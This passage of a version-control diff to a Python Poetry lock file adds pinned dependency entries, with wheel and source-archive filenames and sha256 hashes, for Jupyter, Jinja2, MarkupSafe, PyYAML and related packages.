{file = "isort-5.9.3-py3-none-any.whl", hash = "sha256:e17d6e2b81095c9db0a03a8025a957f334d6ea30b26f9ec70805411e5c7c81f2"},
{file = "isort-5.9.3.tar.gz", hash = "sha256:9c2ea1e62d871267b78307fe511c0838ba0da28698c5732d54e2790bf3ba9899"},
]
+jedi = [
+ {file = "jedi-0.18.0-py2.py3-none-any.whl", hash = "sha256:18456d83f65f400ab0c2d3319e48520420ef43b23a086fdc05dff34132f0fb93"},
+ {file = "jedi-0.18.0.tar.gz", hash = "sha256:92550a404bad8afed881a137ec9a461fed49eca661414be45059329614ed0707"},
+]
+jinja2 = [
+ {file = "Jinja2-3.0.1-py3-none-any.whl", hash = "sha256:1f06f2da51e7b56b8f238affdd6b4e2c61e39598a378cc49345bc1bd42a978a4"},
+ {file = "Jinja2-3.0.1.tar.gz", hash = "sha256:703f484b47a6af502e743c9122595cc812b0271f661722403114f71a79d0f5a4"},
+]
+json5 = [
+ {file = "json5-0.9.6-py2.py3-none-any.whl", hash = "sha256:823e510eb355949bed817e1f3e2d682455dc6af9daf6066d5698d6a2ca4481c2"},
+ {file = "json5-0.9.6.tar.gz", hash = "sha256:9175ad1bc248e22bb8d95a8e8d765958bf0008fef2fe8abab5bc04e0f1ac8302"},
+]
+jsonschema = [
+ {file = "jsonschema-3.2.0-py2.py3-none-any.whl", hash = "sha256:4e5b3cf8216f577bee9ce139cbe72eca3ea4f292ec60928ff24758ce626cd163"},
+ {file = "jsonschema-3.2.0.tar.gz", hash = "sha256:c8a85b28d377cc7737e46e2d9f2b4f44ee3c0e1deac6bf46ddefc7187d30797a"},
+]
+jupyter-client = [
+ {file = "jupyter_client-6.2.0-py3-none-any.whl", hash = "sha256:9715152067e3f7ea3b56f341c9a0f9715c8c7cc316ee0eb13c3c84f5ca0065f5"},
+ {file = "jupyter_client-6.2.0.tar.gz", hash = "sha256:e2ab61d79fbf8b56734a4c2499f19830fbd7f6fefb3e87868ef0545cb3c17eb9"},
+]
+jupyter-core = [
+ {file = "jupyter_core-4.7.1-py3-none-any.whl", hash = "sha256:8c6c0cac5c1b563622ad49321d5ec47017bd18b94facb381c6973a0486395f8e"},
+ {file = "jupyter_core-4.7.1.tar.gz", hash = "sha256:79025cb3225efcd36847d0840f3fc672c0abd7afd0de83ba8a1d3837619122b4"},
+]
+jupyter-server = [
+ {file = "jupyter_server-1.10.2-py3-none-any.whl", hash = "sha256:491c920013144a2d6f5286ab4038df6a081b32352c9c8b928ec8af17eb2a5e10"},
+ {file = "jupyter_server-1.10.2.tar.gz", hash = "sha256:d3a3b68ebc6d7bfee1097f1712cf7709ee39c92379da2cc08724515bb85e72bf"},
+]
+jupyterlab = [
+ {file = "jupyterlab-3.1.6-py3-none-any.whl", hash = "sha256:0d224d56fbf2bae1fdd0f1958d617fabc9f81fa8875d46da19c89d747c89527a"},
+ {file = "jupyterlab-3.1.6.tar.gz", hash = "sha256:6d2ada6a333861f33a1b555d3cb7b07aa9d1ab80f07997b3d0c43878a98c1174"},
+]
+jupyterlab-pygments = [
+ {file = "jupyterlab_pygments-0.1.2-py2.py3-none-any.whl", hash = "sha256:abfb880fd1561987efaefcb2d2ac75145d2a5d0139b1876d5be806e32f630008"},
+ {file = "jupyterlab_pygments-0.1.2.tar.gz", hash = "sha256:cfcda0873626150932f438eccf0f8bf22bfa92345b814890ab360d666b254146"},
+]
+jupyterlab-server = [
+ {file = "jupyterlab_server-2.7.0-py3-none-any.whl", hash = "sha256:244c815578c2fdcd341f01635e77d9f112efcbc92ba299e8c6243f870c84c609"},
+ {file = "jupyterlab_server-2.7.0.tar.gz", hash = "sha256:31457ef564febc42043bc539356c804f6f9144f602e2852150bf0820ed6d7e18"},
+]
lazy-object-proxy = [
{file = "lazy-object-proxy-1.6.0.tar.gz", hash = "sha256:489000d368377571c6f982fba6497f2aa13c6d1facc40660963da62f5c379726"},
{file = "lazy_object_proxy-1.6.0-cp27-cp27m-macosx_10_14_x86_64.whl", hash = "sha256:c6938967f8528b3668622a9ed3b31d145fab161a32f5891ea7b84f6b790be05b"},
@@ -337,10 +1426,54 @@ lazy-object-proxy = [
{file = "lazy_object_proxy-1.6.0-cp39-cp39-win32.whl", hash = "sha256:1fee665d2638491f4d6e55bd483e15ef21f6c8c2095f235fef72601021e64f61"},
{file = "lazy_object_proxy-1.6.0-cp39-cp39-win_amd64.whl", hash = "sha256:f5144c75445ae3ca2057faac03fda5a902eff196702b0a24daf1d6ce0650514b"},
]
+markupsafe = [
+ {file = "MarkupSafe-2.0.1-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:f9081981fe268bd86831e5c75f7de206ef275defcb82bc70740ae6dc507aee51"},
+ {file = "MarkupSafe-2.0.1-cp36-cp36m-manylinux1_i686.whl", hash = "sha256:0955295dd5eec6cb6cc2fe1698f4c6d84af2e92de33fbcac4111913cd100a6ff"},
+ {file = "MarkupSafe-2.0.1-cp36-cp36m-manylinux1_x86_64.whl", hash = "sha256:0446679737af14f45767963a1a9ef7620189912317d095f2d9ffa183a4d25d2b"},
+ {file = "MarkupSafe-2.0.1-cp36-cp36m-manylinux2010_i686.whl", hash = "sha256:f826e31d18b516f653fe296d967d700fddad5901ae07c622bb3705955e1faa94"},
+ {file = "MarkupSafe-2.0.1-cp36-cp36m-manylinux2010_x86_64.whl", hash = "sha256:fa130dd50c57d53368c9d59395cb5526eda596d3ffe36666cd81a44d56e48872"},
+ {file = "MarkupSafe-2.0.1-cp36-cp36m-manylinux2014_aarch64.whl", hash = "sha256:905fec760bd2fa1388bb5b489ee8ee5f7291d692638ea5f67982d968366bef9f"},
+ {file = "MarkupSafe-2.0.1-cp36-cp36m-win32.whl", hash = "sha256:6c4ca60fa24e85fe25b912b01e62cb969d69a23a5d5867682dd3e80b5b02581d"},
+ {file = "MarkupSafe-2.0.1-cp36-cp36m-win_amd64.whl", hash = "sha256:b2f4bf27480f5e5e8ce285a8c8fd176c0b03e93dcc6646477d4630e83440c6a9"},
+ {file = "MarkupSafe-2.0.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:0717a7390a68be14b8c793ba258e075c6f4ca819f15edfc2a3a027c823718567"},
+ {file = "MarkupSafe-2.0.1-cp37-cp37m-manylinux1_i686.whl", hash = "sha256:6557b31b5e2c9ddf0de32a691f2312a32f77cd7681d8af66c2692efdbef84c18"},
+ {file = "MarkupSafe-2.0.1-cp37-cp37m-manylinux1_x86_64.whl", hash = "sha256:49e3ceeabbfb9d66c3aef5af3a60cc43b85c33df25ce03d0031a608b0a8b2e3f"},
+ {file = "MarkupSafe-2.0.1-cp37-cp37m-manylinux2010_i686.whl", hash = "sha256:d7f9850398e85aba693bb640262d3611788b1f29a79f0c93c565694658f4071f"},
+ {file = "MarkupSafe-2.0.1-cp37-cp37m-manylinux2010_x86_64.whl", hash = "sha256:6a7fae0dd14cf60ad5ff42baa2e95727c3d81ded453457771d02b7d2b3f9c0c2"},
+ {file = "MarkupSafe-2.0.1-cp37-cp37m-manylinux2014_aarch64.whl", hash = "sha256:b7f2d075102dc8c794cbde1947378051c4e5180d52d276987b8d28a3bd58c17d"},
+ {file = "MarkupSafe-2.0.1-cp37-cp37m-win32.whl", hash = "sha256:a30e67a65b53ea0a5e62fe23682cfe22712e01f453b95233b25502f7c61cb415"},
+ {file = "MarkupSafe-2.0.1-cp37-cp37m-win_amd64.whl", hash = "sha256:611d1ad9a4288cf3e3c16014564df047fe08410e628f89805e475368bd304914"},
+ {file = "MarkupSafe-2.0.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:be98f628055368795d818ebf93da628541e10b75b41c559fdf36d104c5787066"},
+ {file = "MarkupSafe-2.0.1-cp38-cp38-manylinux1_i686.whl", hash = "sha256:1d609f577dc6e1aa17d746f8bd3c31aa4d258f4070d61b2aa5c4166c1539de35"},
+ {file = "MarkupSafe-2.0.1-cp38-cp38-manylinux1_x86_64.whl", hash = "sha256:7d91275b0245b1da4d4cfa07e0faedd5b0812efc15b702576d103293e252af1b"},
+ {file = "MarkupSafe-2.0.1-cp38-cp38-manylinux2010_i686.whl", hash = "sha256:01a9b8ea66f1658938f65b93a85ebe8bc016e6769611be228d797c9d998dd298"},
+ {file = "MarkupSafe-2.0.1-cp38-cp38-manylinux2010_x86_64.whl", hash = "sha256:47ab1e7b91c098ab893b828deafa1203de86d0bc6ab587b160f78fe6c4011f75"},
+ {file = "MarkupSafe-2.0.1-cp38-cp38-manylinux2014_aarch64.whl", hash = "sha256:97383d78eb34da7e1fa37dd273c20ad4320929af65d156e35a5e2d89566d9dfb"},
+ {file = "MarkupSafe-2.0.1-cp38-cp38-win32.whl", hash = "sha256:023cb26ec21ece8dc3907c0e8320058b2e0cb3c55cf9564da612bc325bed5e64"},
+ {file = "MarkupSafe-2.0.1-cp38-cp38-win_amd64.whl", hash = "sha256:984d76483eb32f1bcb536dc27e4ad56bba4baa70be32fa87152832cdd9db0833"},
+ {file = "MarkupSafe-2.0.1-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:2ef54abee730b502252bcdf31b10dacb0a416229b72c18b19e24a4509f273d26"},
+ {file = "MarkupSafe-2.0.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:3c112550557578c26af18a1ccc9e090bfe03832ae994343cfdacd287db6a6ae7"},
+ {file = "MarkupSafe-2.0.1-cp39-cp39-manylinux1_i686.whl", hash = "sha256:53edb4da6925ad13c07b6d26c2a852bd81e364f95301c66e930ab2aef5b5ddd8"},
+ {file = "MarkupSafe-2.0.1-cp39-cp39-manylinux1_x86_64.whl", hash = "sha256:f5653a225f31e113b152e56f154ccbe59eeb1c7487b39b9d9f9cdb58e6c79dc5"},
+ {file = "MarkupSafe-2.0.1-cp39-cp39-manylinux2010_i686.whl", hash = "sha256:4efca8f86c54b22348a5467704e3fec767b2db12fc39c6d963168ab1d3fc9135"},
+ {file = "MarkupSafe-2.0.1-cp39-cp39-manylinux2010_x86_64.whl", hash = "sha256:ab3ef638ace319fa26553db0624c4699e31a28bb2a835c5faca8f8acf6a5a902"},
+ {file = "MarkupSafe-2.0.1-cp39-cp39-manylinux2014_aarch64.whl", hash = "sha256:f8ba0e8349a38d3001fae7eadded3f6606f0da5d748ee53cc1dab1d6527b9509"},
+ {file = "MarkupSafe-2.0.1-cp39-cp39-win32.whl", hash = "sha256:10f82115e21dc0dfec9ab5c0223652f7197feb168c940f3ef61563fc2d6beb74"},
+ {file = "MarkupSafe-2.0.1-cp39-cp39-win_amd64.whl", hash = "sha256:693ce3f9e70a6cf7d2fb9e6c9d8b204b6b39897a2c4a1aa65728d5ac97dcc1d8"},
+ {file = "MarkupSafe-2.0.1.tar.gz", hash = "sha256:594c67807fb16238b30c44bdf74f36c02cdf22d1c8cda91ef8a0ed8dabf5620a"},
+]
+matplotlib-inline = [
+ {file = "matplotlib-inline-0.1.2.tar.gz", hash = "sha256:f41d5ff73c9f5385775d5c0bc13b424535c8402fe70ea8210f93e11f3683993e"},
+ {file = "matplotlib_inline-0.1.2-py3-none-any.whl", hash = "sha256:5cf1176f554abb4fa98cb362aa2b55c500147e4bdbb07e3fda359143e1da0811"},
+]
mccabe = [
{file = "mccabe-0.6.1-py2.py3-none-any.whl", hash = "sha256:ab8a6258860da4b6677da4bd2fe5dc2c659cff31b3ee4f7f5d64e79735b80d42"},
{file = "mccabe-0.6.1.tar.gz", hash = "sha256:dd8d182285a0fe56bace7f45b5e7d1a6ebcbf524e8f3bd87eb0f125271b8831f"},
]
+mistune = [
+ {file = "mistune-0.8.4-py2.py3-none-any.whl", hash = "sha256:88a1051873018da288eee8538d476dffe1262495144b33ecb586c4ab266bb8d4"},
+ {file = "mistune-0.8.4.tar.gz", hash = "sha256:59a3429db53c50b5c6bcc8a07f8848cb00d7dc8bdb431a4ab41920d201d4756e"},
+]
more-itertools = [
{file = "more-itertools-8.8.0.tar.gz", hash = "sha256:83f0308e05477c68f56ea3a888172c78ed5d5b3c282addb67508e7ba6c8f813a"},
{file = "more_itertools-8.8.0-py3-none-any.whl", hash = "sha256:2cf89ec599962f2ddc4d568a05defc40e0a587fbc10d5989713638864c36be4d"},
@@ -374,22 +1507,81 @@ mypy-extensions = [
{file = "mypy_extensions-0.4.3-py2.py3-none-any.whl", hash = "sha256:090fedd75945a69ae91ce1303b5824f428daf5a028d2f6ab8a299250a846f15d"},
{file = "mypy_extensions-0.4.3.tar.gz", hash = "sha256:2d82818f5bb3e369420cb3c4060a7970edba416647068eb4c5343488a6c604a8"},
]
+nbclassic = [
+ {file = "nbclassic-0.3.1-py3-none-any.whl", hash = "sha256:a7437c90a0bffcce172a4540cc53e140ea5987280c87c31a0cfa6e5d315eb907"},
+ {file = "nbclassic-0.3.1.tar.gz", hash = "sha256:f920f8d09849bea7950e1017ff3bd101763a8d68f565a51ce053572e65aa7947"},
+]
+nbclient = [
+ {file = "nbclient-0.5.3-py3-none-any.whl", hash = "sha256:e79437364a2376892b3f46bedbf9b444e5396cfb1bc366a472c37b48e9551500"},
+ {file = "nbclient-0.5.3.tar.gz", hash = "sha256:db17271330c68c8c88d46d72349e24c147bb6f34ec82d8481a8f025c4d26589c"},
+]
+nbconvert = [
+ {file = "nbconvert-6.1.0-py3-none-any.whl", hash = "sha256:37cd92ff2ae6a268e62075ff8b16129e0be4939c4dfcee53dc77cc8a7e06c684"},
+ {file = "nbconvert-6.1.0.tar.gz", hash = "sha256:d22a8ff202644d31db254d24d52c3a96c82156623fcd7c7f987bba2612303ec9"},
+]
+nbformat = [
+ {file = "nbformat-5.1.3-py3-none-any.whl", hash = "sha256:eb8447edd7127d043361bc17f2f5a807626bc8e878c7709a1c647abda28a9171"},
+ {file = "nbformat-5.1.3.tar.gz", hash = "sha256:b516788ad70771c6250977c1374fcca6edebe6126fd2adb5a69aa5c2356fd1c8"},
+]
+nest-asyncio = [
+ {file = "nest_asyncio-1.5.1-py3-none-any.whl", hash = "sha256:76d6e972265063fe92a90b9cc4fb82616e07d586b346ed9d2c89a4187acea39c"},
+ {file = "nest_asyncio-1.5.1.tar.gz", hash = "sha256:afc5a1c515210a23c461932765691ad39e8eba6551c055ac8d5546e69250d0aa"},
+]
+notebook = [
+ {file = "notebook-6.4.3-py3-none-any.whl", hash = "sha256:b50eafa8208d5db966efd1caa4076b4dfc51815e02a805b32ecd717e9e6cc071"},
+ {file = "notebook-6.4.3.tar.gz", hash = "sha256:e6b6dfed36b00cf950f63c0d42e947c101d4258aec21624de62b9e0c11ed5c0d"},
+]
packaging = [
{file = "packaging-21.0-py3-none-any.whl", hash = "sha256:c86254f9220d55e31cc94d69bade760f0847da8000def4dfe1c6b872fd14ff14"},
{file = "packaging-21.0.tar.gz", hash = "sha256:7dc96269f53a4ccec5c0670940a4281106dd0bb343f47b7471f779df49c2fbe7"},
]
+pandocfilters = [
+ {file = "pandocfilters-1.4.3.tar.gz", hash = "sha256:bc63fbb50534b4b1f8ebe1860889289e8af94a23bff7445259592df25a3906eb"},
+]
+parso = [
+ {file = "parso-0.8.2-py2.py3-none-any.whl", hash = "sha256:a8c4922db71e4fdb90e0d0bc6e50f9b273d3397925e5e60a717e719201778d22"},
+ {file = "parso-0.8.2.tar.gz", hash = "sha256:12b83492c6239ce32ff5eed6d3639d6a536170723c6f3f1506869f1ace413398"},
+]
pathspec = [
{file = "pathspec-0.9.0-py2.py3-none-any.whl", hash = "sha256:7d15c4ddb0b5c802d161efc417ec1a2558ea2653c2e8ad9c19098201dc1c993a"},
{file = "pathspec-0.9.0.tar.gz", hash = "sha256:e564499435a2673d586f6b2130bb5b95f04a3ba06f81b8f895b651a3c76aabb1"},
]
+pexpect = [
+ {file = "pexpect-4.8.0-py2.py3-none-any.whl", hash = "sha256:0b48a55dcb3c05f3329815901ea4fc1537514d6ba867a152b581d69ae3710937"},
+ {file = "pexpect-4.8.0.tar.gz", hash = "sha256:fc65a43959d153d0114afe13997d439c22823a27cefceb5ff35c2178c6784c0c"},
+]
+pickleshare = [
+ {file = "pickleshare-0.7.5-py2.py3-none-any.whl", hash = "sha256:9649af414d74d4df115d5d718f82acb59c9d418196b7b4290ed47a12ce62df56"},
+ {file = "pickleshare-0.7.5.tar.gz", hash = "sha256:87683d47965c1da65cdacaf31c8441d12b8044cdec9aca500cd78fc2c683afca"},
+]
pluggy = [
{file = "pluggy-0.13.1-py2.py3-none-any.whl", hash = "sha256:966c145cd83c96502c3c3868f50408687b38434af77734af1e9ca461a4081d2d"},
{file = "pluggy-0.13.1.tar.gz", hash = "sha256:15b2acde666561e1298d71b523007ed7364de07029219b604cf808bfa1c765b0"},
]
+prometheus-client = [
+ {file = "prometheus_client-0.11.0-py2.py3-none-any.whl", hash = "sha256:b014bc76815eb1399da8ce5fc84b7717a3e63652b0c0f8804092c9363acab1b2"},
+ {file = "prometheus_client-0.11.0.tar.gz", hash = "sha256:3a8baade6cb80bcfe43297e33e7623f3118d660d41387593758e2fb1ea173a86"},
+]
+prompt-toolkit = [
+ {file = "prompt_toolkit-3.0.19-py3-none-any.whl", hash = "sha256:7089d8d2938043508aa9420ec18ce0922885304cddae87fb96eebca942299f88"},
+ {file = "prompt_toolkit-3.0.19.tar.gz", hash = "sha256:08360ee3a3148bdb5163621709ee322ec34fc4375099afa4bbf751e9b7b7fa4f"},
+]
+ptyprocess = [
+ {file = "ptyprocess-0.7.0-py2.py3-none-any.whl", hash = "sha256:4b41f3967fce3af57cc7e94b888626c18bf37a083e3651ca8feeb66d492fef35"},
+ {file = "ptyprocess-0.7.0.tar.gz", hash = "sha256:5c5d0a3b48ceee0b48485e0c26037c0acd7d29765ca3fbb5cb3831d347423220"},
+]
py = [
{file = "py-1.10.0-py2.py3-none-any.whl", hash = "sha256:3b80836aa6d1feeaa108e046da6423ab8f6ceda6468545ae8d02d9d58d18818a"},
{file = "py-1.10.0.tar.gz", hash = "sha256:21b81bda15b66ef5e1a777a21c4dcd9c20ad3efd0b3f817e7a809035269e1bd3"},
]
+pycparser = [
+ {file = "pycparser-2.20-py2.py3-none-any.whl", hash = "sha256:7582ad22678f0fcd81102833f60ef8d0e57288b6b5fb00323d101be910e35705"},
+ {file = "pycparser-2.20.tar.gz", hash = "sha256:2d475327684562c3a96cc71adf7dc8c4f0565175cf86b6d7a404ff4c771f15f0"},
+]
+pygments = [
+ {file = "Pygments-2.9.0-py3-none-any.whl", hash = "sha256:d66e804411278594d764fc69ec36ec13d9ae9147193a1740cd34d272ca383b8e"},
+ {file = "Pygments-2.9.0.tar.gz", hash = "sha256:a18f47b506a429f6f4b9df81bb02beab9ca21d0a5fee38ed15aef65f0545519f"},
+]
pylint = [
{file = "pylint-2.9.6-py3-none-any.whl", hash = "sha256:2e1a0eb2e8ab41d6b5dbada87f066492bb1557b12b76c47c2ee8aa8a11186594"},
{file = "pylint-2.9.6.tar.gz", hash = "sha256:8b838c8983ee1904b2de66cce9d0b96649a91901350e956d78f289c3bc87b48e"},
@@ -398,10 +1590,130 @@ pyparsing = [
{file = "pyparsing-2.4.7-py2.py3-none-any.whl", hash = "sha256:ef9d7589ef3c200abe66653d3f1ab1033c3c419ae9b9bdb1240a85b024efc88b"},
{file = "pyparsing-2.4.7.tar.gz", hash = "sha256:c203ec8783bf771a155b207279b9bccb8dea02d8f0c9e5f8ead507bc3246ecc1"},
]
+pyrsistent = [
+ {file = "pyrsistent-0.18.0-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:f4c8cabb46ff8e5d61f56a037974228e978f26bfefce4f61a4b1ac0ba7a2ab72"},
+ {file = "pyrsistent-0.18.0-cp36-cp36m-manylinux1_i686.whl", hash = "sha256:da6e5e818d18459fa46fac0a4a4e543507fe1110e808101277c5a2b5bab0cd2d"},
+ {file = "pyrsistent-0.18.0-cp36-cp36m-manylinux1_x86_64.whl", hash = "sha256:5e4395bbf841693eaebaa5bb5c8f5cdbb1d139e07c975c682ec4e4f8126e03d2"},
+ {file = "pyrsistent-0.18.0-cp36-cp36m-win32.whl", hash = "sha256:527be2bfa8dc80f6f8ddd65242ba476a6c4fb4e3aedbf281dfbac1b1ed4165b1"},
+ {file = "pyrsistent-0.18.0-cp36-cp36m-win_amd64.whl", hash = "sha256:2aaf19dc8ce517a8653746d98e962ef480ff34b6bc563fc067be6401ffb457c7"},
+ {file = "pyrsistent-0.18.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:58a70d93fb79dc585b21f9d72487b929a6fe58da0754fa4cb9f279bb92369396"},
+ {file = "pyrsistent-0.18.0-cp37-cp37m-manylinux1_i686.whl", hash = "sha256:4916c10896721e472ee12c95cdc2891ce5890898d2f9907b1b4ae0f53588b710"},
+ {file = "pyrsistent-0.18.0-cp37-cp37m-manylinux1_x86_64.whl", hash = "sha256:73ff61b1411e3fb0ba144b8f08d6749749775fe89688093e1efef9839d2dcc35"},
+ {file = "pyrsistent-0.18.0-cp37-cp37m-win32.whl", hash = "sha256:b29b869cf58412ca5738d23691e96d8aff535e17390128a1a52717c9a109da4f"},
+ {file = "pyrsistent-0.18.0-cp37-cp37m-win_amd64.whl", hash = "sha256:097b96f129dd36a8c9e33594e7ebb151b1515eb52cceb08474c10a5479e799f2"},
+ {file = "pyrsistent-0.18.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:772e94c2c6864f2cd2ffbe58bb3bdefbe2a32afa0acb1a77e472aac831f83427"},
+ {file = "pyrsistent-0.18.0-cp38-cp38-manylinux1_i686.whl", hash = "sha256:c1a9ff320fa699337e05edcaae79ef8c2880b52720bc031b219e5b5008ebbdef"},
+ {file = "pyrsistent-0.18.0-cp38-cp38-manylinux1_x86_64.whl", hash = "sha256:cd3caef37a415fd0dae6148a1b6957a8c5f275a62cca02e18474608cb263640c"},
+ {file = "pyrsistent-0.18.0-cp38-cp38-win32.whl", hash = "sha256:e79d94ca58fcafef6395f6352383fa1a76922268fa02caa2272fff501c2fdc78"},
+ {file = "pyrsistent-0.18.0-cp38-cp38-win_amd64.whl", hash = "sha256:a0c772d791c38bbc77be659af29bb14c38ced151433592e326361610250c605b"},
+ {file = "pyrsistent-0.18.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:d5ec194c9c573aafaceebf05fc400656722793dac57f254cd4741f3c27ae57b4"},
+ {file = "pyrsistent-0.18.0-cp39-cp39-manylinux1_i686.whl", hash = "sha256:6b5eed00e597b5b5773b4ca30bd48a5774ef1e96f2a45d105db5b4ebb4bca680"},
+ {file = "pyrsistent-0.18.0-cp39-cp39-manylinux1_x86_64.whl", hash = "sha256:48578680353f41dca1ca3dc48629fb77dfc745128b56fc01096b2530c13fd426"},
+ {file = "pyrsistent-0.18.0-cp39-cp39-win32.whl", hash = "sha256:f3ef98d7b76da5eb19c37fda834d50262ff9167c65658d1d8f974d2e4d90676b"},
+ {file = "pyrsistent-0.18.0-cp39-cp39-win_amd64.whl", hash = "sha256:404e1f1d254d314d55adb8d87f4f465c8693d6f902f67eb6ef5b4526dc58e6ea"},
+ {file = "pyrsistent-0.18.0.tar.gz", hash = "sha256:773c781216f8c2900b42a7b638d5b517bb134ae1acbebe4d1e8f1f41ea60eb4b"},
+]
pytest = [
{file = "pytest-5.4.3-py3-none-any.whl", hash = "sha256:5c0db86b698e8f170ba4582a492248919255fcd4c79b1ee64ace34301fb589a1"},
{file = "pytest-5.4.3.tar.gz", hash = "sha256:7979331bfcba207414f5e1263b5a0f8f521d0f457318836a7355531ed1a4c7d8"},
]
+python-dateutil = [
+ {file = "python-dateutil-2.8.2.tar.gz", hash = "sha256:0123cacc1627ae19ddf3c27a5de5bd67ee4586fbdd6440d9748f8abb483d3e86"},
+ {file = "python_dateutil-2.8.2-py2.py3-none-any.whl", hash = "sha256:961d03dc3453ebbc59dbdea9e4e11c5651520a876d0f4db161e8674aae935da9"},
+]
+pytz = [
+ {file = "pytz-2021.1-py2.py3-none-any.whl", hash = "sha256:eb10ce3e7736052ed3623d49975ce333bcd712c7bb19a58b9e2089d4057d0798"},
+ {file = "pytz-2021.1.tar.gz", hash = "sha256:83a4a90894bf38e243cf052c8b58f381bfe9a7a483f6a9cab140bc7f702ac4da"},
+]
+pywin32 = [
+ {file = "pywin32-301-cp35-cp35m-win32.whl", hash = "sha256:93367c96e3a76dfe5003d8291ae16454ca7d84bb24d721e0b74a07610b7be4a7"},
+ {file = "pywin32-301-cp35-cp35m-win_amd64.whl", hash = "sha256:9635df6998a70282bd36e7ac2a5cef9ead1627b0a63b17c731312c7a0daebb72"},
+ {file = "pywin32-301-cp36-cp36m-win32.whl", hash = "sha256:c866f04a182a8cb9b7855de065113bbd2e40524f570db73ef1ee99ff0a5cc2f0"},
+ {file = "pywin32-301-cp36-cp36m-win_amd64.whl", hash = "sha256:dafa18e95bf2a92f298fe9c582b0e205aca45c55f989937c52c454ce65b93c78"},
+ {file = "pywin32-301-cp37-cp37m-win32.whl", hash = "sha256:98f62a3f60aa64894a290fb7494bfa0bfa0a199e9e052e1ac293b2ad3cd2818b"},
+ {file = "pywin32-301-cp37-cp37m-win_amd64.whl", hash = "sha256:fb3b4933e0382ba49305cc6cd3fb18525df7fd96aa434de19ce0878133bf8e4a"},
+ {file = "pywin32-301-cp38-cp38-win32.whl", hash = "sha256:88981dd3cfb07432625b180f49bf4e179fb8cbb5704cd512e38dd63636af7a17"},
+ {file = "pywin32-301-cp38-cp38-win_amd64.whl", hash = "sha256:8c9d33968aa7fcddf44e47750e18f3d034c3e443a707688a008a2e52bbef7e96"},
+ {file = "pywin32-301-cp39-cp39-win32.whl", hash = "sha256:595d397df65f1b2e0beaca63a883ae6d8b6df1cdea85c16ae85f6d2e648133fe"},
+ {file = "pywin32-301-cp39-cp39-win_amd64.whl", hash = "sha256:87604a4087434cd814ad8973bd47d6524bd1fa9e971ce428e76b62a5e0860fdf"},
+]
+pywinpty = [
+ {file = "pywinpty-1.1.3-cp36-none-win_amd64.whl", hash = "sha256:81dc6f16d917b756e06fc58943e9750d59dbefc0ffd2086871d3fa5f33824446"},
+ {file = "pywinpty-1.1.3-cp37-none-win_amd64.whl", hash = "sha256:54557887e712ea3215ab0d9f089ed55a6cc8d826cd5d1e340d75300654c9663f"},
+ {file = "pywinpty-1.1.3-cp38-none-win_amd64.whl", hash = "sha256:f5e25197397f1fef0362caf3eb89f25441827a1e48bf15827c27021592fd2160"},
+ {file = "pywinpty-1.1.3-cp39-none-win_amd64.whl", hash = "sha256:b767276224f86b7560eb9173ba7956758cafcdfab97bb33837d42d2a0f1dbf67"},
+ {file = "pywinpty-1.1.3.tar.gz", hash = "sha256:3a1d57b338390333812a5eed31c93c7d8ba82b131078063703e731946d90c9f2"},
+]
+pyyaml = [
+ {file = "PyYAML-5.4.1-cp27-cp27m-macosx_10_9_x86_64.whl", hash = "sha256:3b2b1824fe7112845700f815ff6a489360226a5609b96ec2190a45e62a9fc922"},
+ {file = "PyYAML-5.4.1-cp27-cp27m-win32.whl", hash = "sha256:129def1b7c1bf22faffd67b8f3724645203b79d8f4cc81f674654d9902cb4393"},
+ {file = "PyYAML-5.4.1-cp27-cp27m-win_amd64.whl", hash = "sha256:4465124ef1b18d9ace298060f4eccc64b0850899ac4ac53294547536533800c8"},
+ {file = "PyYAML-5.4.1-cp27-cp27mu-manylinux1_x86_64.whl", hash = "sha256:bb4191dfc9306777bc594117aee052446b3fa88737cd13b7188d0e7aa8162185"},
+ {file = "PyYAML-5.4.1-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:6c78645d400265a062508ae399b60b8c167bf003db364ecb26dcab2bda048253"},
+ {file = "PyYAML-5.4.1-cp36-cp36m-manylinux1_x86_64.whl", hash = "sha256:4e0583d24c881e14342eaf4ec5fbc97f934b999a6828693a99157fde912540cc"},
+ {file = "PyYAML-5.4.1-cp36-cp36m-manylinux2014_aarch64.whl", hash = "sha256:72a01f726a9c7851ca9bfad6fd09ca4e090a023c00945ea05ba1638c09dc3347"},
+ {file = "PyYAML-5.4.1-cp36-cp36m-manylinux2014_s390x.whl", hash = "sha256:895f61ef02e8fed38159bb70f7e100e00f471eae2bc838cd0f4ebb21e28f8541"},
+ {file = "PyYAML-5.4.1-cp36-cp36m-win32.whl", hash = "sha256:3bd0e463264cf257d1ffd2e40223b197271046d09dadf73a0fe82b9c1fc385a5"},
+ {file = "PyYAML-5.4.1-cp36-cp36m-win_amd64.whl", hash = "sha256:e4fac90784481d221a8e4b1162afa7c47ed953be40d31ab4629ae917510051df"},
+ {file = "PyYAML-5.4.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:5accb17103e43963b80e6f837831f38d314a0495500067cb25afab2e8d7a4018"},
+ {file = "PyYAML-5.4.1-cp37-cp37m-manylinux1_x86_64.whl", hash = "sha256:e1d4970ea66be07ae37a3c2e48b5ec63f7ba6804bdddfdbd3cfd954d25a82e63"},
+ {file = "PyYAML-5.4.1-cp37-cp37m-manylinux2014_aarch64.whl", hash = "sha256:cb333c16912324fd5f769fff6bc5de372e9e7a202247b48870bc251ed40239aa"},
+ {file = "PyYAML-5.4.1-cp37-cp37m-manylinux2014_s390x.whl", hash = "sha256:fe69978f3f768926cfa37b867e3843918e012cf83f680806599ddce33c2c68b0"},
+ {file = "PyYAML-5.4.1-cp37-cp37m-win32.whl", hash = "sha256:dd5de0646207f053eb0d6c74ae45ba98c3395a571a2891858e87df7c9b9bd51b"},
+ {file = "PyYAML-5.4.1-cp37-cp37m-win_amd64.whl", hash = "sha256:08682f6b72c722394747bddaf0aa62277e02557c0fd1c42cb853016a38f8dedf"},
+ {file = "PyYAML-5.4.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:d2d9808ea7b4af864f35ea216be506ecec180628aced0704e34aca0b040ffe46"},
